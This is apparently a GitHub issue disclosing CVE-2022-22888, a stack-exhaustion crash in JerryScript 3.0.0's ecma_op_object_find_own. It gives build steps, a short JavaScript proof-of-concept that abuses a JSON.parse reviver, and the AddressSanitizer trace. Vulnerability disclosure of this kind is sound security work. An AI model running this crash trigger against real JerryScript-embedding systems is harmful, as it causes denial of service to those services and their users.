CVE-2022-22888: Stack-overflow in ecma-objects (ecma_op_object_find_own) · Issue #4848 · jerryscript-project/jerryscript

JerryScript 3.0.0 was discovered to contain a stack overflow via ecma_op_object_find_own in jerry-core/ecma/operations/ecma-objects.c. The AddressSanitizer report below classifies it as stack-overflow (native stack exhaustion through unbounded recursion), not a stack-buffer-overflow: a script-reachable crash of the engine, i.e. a denial of service, rather than a memory-corruption write.


JerryScript revision

4592143

Build platform

Ubuntu 18.04.5 LTS (Linux 4.19.128-microsoft-standard x86_64)
Ubuntu 18.04.5 LTS (Linux 5.4.0-44-generic x86_64)

Build steps

```sh
./tools/build.py --clean --debug --compile-flag=-fsanitize=address --compile-flag=-m32 --lto=off --logging=on --line-info=on --error-message=on --system-allocator=on --profile=es2015-subset --stack-limit=20
```

Test case

```js
var once = false;
var m = 1;

// Reviver for JSON.parse: on the first call it creates the array m and stores it
// into the holder (`this`) at index 2; every call assigns m to holder[2] again
// and returns m, so each visited element is replaced by the same array.
function JSEtest() {
  if (!once) {
    m = new Array(1, 2, 3);
    this[2] = m;
  }
  once = true;
  return this[2] = m;
}

JSON.parse("[1, 2, [4, 5]]", JSEtest);
```

Execution steps & Output

```
$ ./jerryscript/build/bin/jerry poc1.js
ASAN:DEADLYSIGNAL
==5376==ERROR: AddressSanitizer: stack-overflow on address 0xff3e5ff0 (pc 0x56722cec bp 0x00000000 sp 0xff3e5ff0 T0)
    #0 0x56722ceb in ecma_op_object_find_own /root/jerryscript/jerry-core/ecma/operations/ecma-objects.c:490
    #1 0x56a4ae1f (/root/jerryscript/build/bin/jerry+0x46fe1f)

SUMMARY: AddressSanitizer: stack-overflow /root/jerryscript/jerry-core/ecma/operations/ecma-objects.c:490 in ecma_op_object_find_own
==5376==ABORTING
```

Credits: Found by OWL337 team.
